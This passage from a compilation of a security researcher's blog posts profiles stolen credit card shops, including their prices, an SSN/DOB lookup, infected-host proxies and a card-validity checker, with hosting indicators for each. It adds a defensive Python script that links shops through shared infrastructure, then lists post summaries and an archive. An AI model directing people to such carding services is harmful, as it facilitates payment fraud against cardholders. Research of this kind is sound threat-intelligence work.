Cards page. It will show you all information like Last Name 
and all the additional info like phone, email. 

P.S If you dislike new shop V.2 of our shop, then please use 
support link and send us your feedback to admin, if you 
want to back old shop V.1 then send feedback with proper 
reasons why u again want to see old shop V.1" 

The current price for a stolen credit card is $1.80 for every 
card. Next to offering stolen credit cards as a service, the 
shop is also offering an SSN and DOB Searcher, next to the 
opportunity for customers of the shop to also 
purchase proxies - compromised malware infected hosts. 

Domain reconnaissance 

vzone.tc - 49.212.25.242 - Name server: dns1.yandex.ru - 
Email: adamsnames@rrpproxy.net - AS9371, SAKURA-C 
SAKURA Internet - HOSTED IN JAPAN 

_DumpsCheck.com 

dumpscheck.com, associated with the following ICQ - 
612303315, is an advanced checker for the validity of stolen 
credit card details. The web site says "Current merchant 
accepts VISA, MASTERCARD, AMEX, DISCOVER, DINERS, 
JCB." 

Domain reconnaissance 

dumpscheck.com - 206.217.196.47 - Name server: 
NS1.DUMPSCHECK.COM - ICQ 612303315; AS4436, NLAYER 
Communications, Inc. - HOSTED IN THE UNITED STATES 
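Several of the reconnaissance records above overlap on name servers, ASNs and adjacent IP ranges, which is how an analyst links shops run on shared infrastructure. The following added example (not code from the original post) parses records written in that "domain - IP - Name server - Email - AS - HOSTED IN" style and lists every indicator shared by two or more domains, deliberately ignoring WHOIS-privacy contact addresses, which are shared by unrelated domains and would create false links; the sample input is constructed from six of the records above.

```python
import re
from collections import defaultdict
from ipaddress import ip_network

# Constructed sample: six of the reconnaissance records from this post, one per line,
# normalised to "domain - IP(s) - Name server: X - Email: Y - ASnnnn, org - HOSTED IN ...".
RECORDS = """\
cardshop.bz - 217.23.9.67 - Name server: ns1.servicedns.nl - Email: contact@privacyprotect.org - AS49981, WorldStream - HOSTED IN THE NETHERLANDS
ccstore.ru - 91.220.101.200 - Name server: ns1.1000dns.net - Email: ccstoreru@yahoo.com - AS49704 - HOSTED IN THE NETHERLANDS
magic-numbers.cc - 91.213.175.89; 91.223.77.35 - Name server: NS1.1000DNS.NET - Email: contact@privacyprotect.org - AS6849, UKRTELNET JSC - HOSTED IN UKRAINE
perfect-numbers.cc - 91.220.101.75 - Name server: NS1.1000DNS.NET - AS49704 - HOSTED IN THE NETHERLANDS
privateservices.ws - 217.23.9.92 - Name server: ns1.servicedns.nl - AS49981, WorldStream - HOSTED IN THE NETHERLANDS
track2.name - 91.213.175.121 - AS6849, UKRTELNET JSC - HOSTED IN UKRAINE
"""

# WHOIS-privacy services seen in the records above: their contact addresses are shared
# by many unrelated domains, so an e-mail match against them proves nothing.
PRIVACY_PROXIES = {"privacyprotect.org", "whoisprivacyprotect.com", "whoisservices.cn"}

IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
NS_RE = re.compile(r"Name server:\s*([\w.-]+)", re.I)
EMAIL_RE = re.compile(r"Email:\s*([\w.+-]+@[\w.-]+)", re.I)
ASN_RE = re.compile(r"\bAS\s?(\d+)\b")


def parse_record(line):
    """Pull the domain and every pivotable indicator out of one record line."""
    domain = line.split(" - ", 1)[0].strip().lower()
    emails = [e.lower() for e in EMAIL_RE.findall(line)
              if e.lower().split("@")[1] not in PRIVACY_PROXIES]
    return {"domain": domain,
            "ips": IP_RE.findall(line),
            "ns": [n.lower() for n in NS_RE.findall(line)],
            "emails": emails,
            "asn": ["AS" + a for a in ASN_RE.findall(line)]}


def parse_records(text):
    return [parse_record(line) for line in text.splitlines() if " - " in line]


def pivot(records):
    """Map each indicator shared by two or more domains to the sorted list of those domains.
    IPs are generalised to their /24 so neighbouring addresses at one host also link."""
    index = defaultdict(set)
    for r in records:
        for ns in r["ns"]:
            index[("ns", ns)].add(r["domain"])
        for e in r["emails"]:
            index[("email", e)].add(r["domain"])
        for a in r["asn"]:
            index[("asn", a)].add(r["domain"])
        for ip in r["ips"]:
            index[("net", str(ip_network(f"{ip}/24", strict=False)))].add(r["domain"])
    return {k: sorted(v) for k, v in index.items() if len(v) > 1}


PIVOTS = pivot(parse_records(RECORDS))

if __name__ == "__main__":
    for (kind, value), domains in sorted(PIVOTS.items()):
        print(f"{kind:5} {value:24} {', '.join(domains)}")
```

On the sample, the 1000dns.net name server links three shops and the 217.23.9.0/24 range and AS49981 tie cardshop.bz to privateservices.ws, while the shared privacyprotect.org address produces no link.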

Related posts on the economics of cybercrime: 

[7] New report details the prices within the 
cybercrime market 

[8] CardCops: Stolen credit card details getting 
cheaper 

[9] Microsoft study debunks profitability of the 
underground economy 

[10] Are Stolen Credit Card Details Getting Cheaper? 

[11] Squeezing the Cybercrime Ecosystem in 2009 

[12] Price Discrimination in the Market for Stolen 
Credit Cards 

[13] The Underground Economy's Supply of Goods 

[14] Microsoft study debunks phishing profitability 

This post has been reproduced from [15]Dancho 
Danchev's blog. Follow him [16]on Twitter. 
Summarizing ZDNet's Zero Day Posts for October 
(2011-12-04 21:05) 

The following is a brief summary of all of my posts at 
ZDNet's Zero Day for October. You can subscribe to my 
[1]personal RSS feed, [2]Zero Day's main feed, or 
follow me on Twitter: 

01. [3]iPhone 5 themed emails serve Windows 
malware 

02. [4]27 of 100 tested Chrome extensions contain 51 
vulnerabilities 

03. [5]37 percent of users browsing the Web with 
insecure Java versions 

04. [6]Google introduces Safe Browsing Alerts for 
network administrators 

05. [7]Malware Watch: U.S Chamber of Commerce 
official letter; DHL delivery error, IRS notifications 
06. [8]'Steve Jobs Alive!' emails lead to exploits and 
malware 

07. [9]Which is the most popular malware 
propagation tactic? 

08. [10]Spamvertised 'Cancellation of the package 
delivery' emails serving malware 

09. [11]Hacking group from Nepal posts 10,000 stolen 
Facebook accounts online 

10. [12]Over a million web sites affected in mass SQL 
injection attack 

11. [13]New Mac OS X malware disables Apple's 
malware protection 

12. [14]New Mac OS X malware with DDoS 
functionality spotted in the wild 

13. [15]Security researcher finds major security flaw 
in Facebook 

This post has been reproduced from [16]Dancho 
Danchev's blog. Follow him [17]on Twitter. 

1. http://www.zdnet.com/topics/dancho+danchev? 

nepal-posts-10000-stolen-facebook-accounts-online/9 

12. http://www.zdnet.com/blog/security/over-a-million-web- 
sites-affected-in-mass-sql-injection-attack/9662 

13. http://www.zdnet.com/blog/security/new-mac-os-x- 
malware-disables-apples-malware-protection/9665 

15. http://www.zdnet.com/blog/security/security-researcher- 
finds-major-security-flaw-in-facebook/9704 
Twitter Spam Campaign (2010-06-16 14:32) 

■ Sampling 419 Advance Fee Scams Activity 
(2010-06-17 16:25) 

■ Money Mule Recruiters Trick Mules into Installing 
Fake Transaction Certificates (2010-06-29 11:07) 

o July 

■ Summarizing Zero Day's Posts for June (2010- 
07-05 21:35) 

■ Cybercriminals SQL Inject Cybercrime-friendly 
Proxies Service (2010-07-13 23:00) 

■ Exploits, Malware, and Scareware Courtesy of 
AS6851, BKCNET, Sagade Ltd. (2010-07-14 
19:54) 

■ Sampling Malicious Activity Inside Cybercrime- 
Friendly Search Engines (2010-07-15 17:44) 

■ Spamvertised Amazon "Verify Your Email", "Your 
Amazon Order" Malicious Emails (2010-07-16 
21:17) 

■ Dissecting the Xerox WorkCentre Pro Scanned 
Document Themed Campaign (2010-07-19 
20:26) 

■ ZeuS Crimeware Serving 123Greetings Ecard 
Themed Campaign in the Wild (2010-07-20 
23:40) 

o August 

■ Summarizing Zero Day's Posts for July (2010-08- 
02 14:54) 

■ Spamvertised Best Buy, Macy's, Evite and Target 
Themed Scareware/Exploits Serving Campaign 
(2010-08-09 14:19) 

■ Dissecting a Scareware-Serving Black Hat SEO 
Campaign Using Compromised .NU.CH Sites 
(2010-08-13 17:09) 

o September 

■ Historical OSINT: Celebrities Death, FedEx 
Invoices, Office-Themed Malware Campaigns 
(2010-09-08 21:07) 

■ Summarizing 3 Years of Research Into Cyber 
Jihad (2010-09-11 16:24) 

2011 

o January 

■ Top Ten Must-Read DDanchev Posts For 2010 
(2011-01-22 00:25) 

■ Top Ten Must-Read Posts at ZDNet's Zero Day for 
2010 (2011-01-22 12:06) 

■ Spamvertised "Your password has been stolen!" 
Malware Campaign Circulating (2011-01-26 
20:30) 

■ Keeping Money Mule Recruiters on a Short Leash 
- Part Five (2011-01-31 12:58) 

o February 

■ (2011-02-09 12:43) 

■ Spamvertised Portfolio of 
Fraudulent/Pharmaceutical Domains (2011-02- 
14 20:14) 

■ A Diverse Portfolio of Fake Security Software - 
Part Twenty Five (2011-02-15 16:06) 

■ Bogus Adult Content SPAM-ed Over ICQ (2011- 
02-16 13:25) 

■ Sampling 419 Advance Fee Scams Activity - Part 
Two (2011-02-21 13:54) 

■ Summarizing Zero Day's Posts for February 
(2011-02-28 15:59) 
o March 

■ Compromised University Leads to Fraudulent 
Google Brand-jacked Pharmaceutical Ads (2011- 
03-07 14:08) 

■ Keeping Money Mule Recruiters on a Short Leash 
- Part Six (2011-03-10 14:45) 

■ Spamvertised DHL Notification Malware 
Campaign (2011-03-10 15:29) 

■ Compromised University Leads to Fraudulent 
Pharmaceutical Ads (2011-03-10 16:53) 

■ More Spamvertised DHL Notifications Spread 
Malware (2011-03-11 15:31) 

■ Spamvertised FedEx Notifications Spread 
Malware (2011-03-16 18:14) 

■ Compromised Universities Leads to Fraudulent 
Pharmaceutical Ads (2011-03-16 19:30) 

■ Spamvertised United Parcel Service notifications 
serve malware (2011-03-23 15:54) 

■ Spamvertised Post Office Express Mail (USPS) 
Emails Serving Malware (2011-03-25 18:20) 

■ Dissecting the Massive SQL Injection Attack 
Serving Scareware (2011-03-31 19:54) 

o April 

■ Spamvertised DHL Notifications Scareware 
Campaign (2011-04-04 16:44) 

■ Summarizing Zero Day's Posts for March (2011- 
04-04 18:56) 

■ Don't Play Poker on an Infected Table - Part Four 
(2011-04-11 18:10) 

■ Spamvertised "Request Rejected" Campaign 
Serving Scareware (2011-04-12 20:22) 
■ Spamvertised "Successful! Order 977132" Leads 
to Scareware (2011-04-28 14:50) 

o May 

■ Summarizing ZDNet's Zero Day Posts for April 
(2011-05-09 12:50) 

■ Don't Play Poker on an Infected Table - Part Five 
(2011-05-09 15:52) 

■ A Peek inside a New DDoS Bot - "Snap" (2011- 
05-09 17:03) 

■ Keeping Money Mule Recruiters on a Short Leash 
- Part Seven (2011-05-10 12:41) 

■ Keeping Money Mule Recruiters on a Short Leash 
- Part Eight - Historical OSINT (2011-05-25 
13:18) 

■ A Peek inside the Vertex Net Loader (2011-05-26 
16:34) 

■ Keeping Money Mule Recruiters on a Short Leash 
- Part Nine (2011-05-30 12:09) 

o June 

■ Summarizing ZDNet's Zero Day Posts for May 
(2011-06-08 16:24) 

o July 

■ Summarizing ZDNet's Zero Day Posts for June 
(2011-07-07 12:24) 

■ Keeping Money Mule Recruiters on a Short Leash 
- Part Ten (2011-07-07 13:25) 

o August 
■ Summarizing ZDNet's Zero Day Posts for July 
(2011-08-22 18:06) 

■ A Peek Inside Web Malware Exploitation Kits 
(2011-08-29 13:19) 

■ Keeping Money Mule Recruiters on a Short Leash 
- Part Eleven (2011-08-29 15:51) 

o September 

■ Summarizing 3 Years of Research Into Cyber 
Jihad (2011-09-11 13:34) 

■ Summarizing ZDNet's Zero Day Posts for August 
(2011-09-27 19:13) 

■ Spamvertised 'Uniform Traffic Ticket' and 'FDIC 
Notifications' Serving Malware - Historical OSINT 
(2011-09-28 14:43) 

o October 

■ Summarizing ZDNet's Zero Day Posts for 
September (2011-10-04 14:37) 

■ Spamvertised "NACHA security nitification" 
Serving Malware - Historical OSINT (2011-10-04 
14:38) 

■ Spamvertised "IRS notice" Serving Malware 
(2011-10-09 19:53) 

■ Spamvertised IRS-themed "Last Notice" Emails 
Serving Malware (2011-10-18 21:45) 

■ Dissecting the Ongoing Mass SQL Injection 
Attack (2011-10-20 23:36) 

■ Exposing the Market for Stolen Credit Cards 
Data (2011-10-31 02:07) 

o December 

■ Summarizing ZDNet's Zero Day Posts for 
October (2011-12-04 21:05) 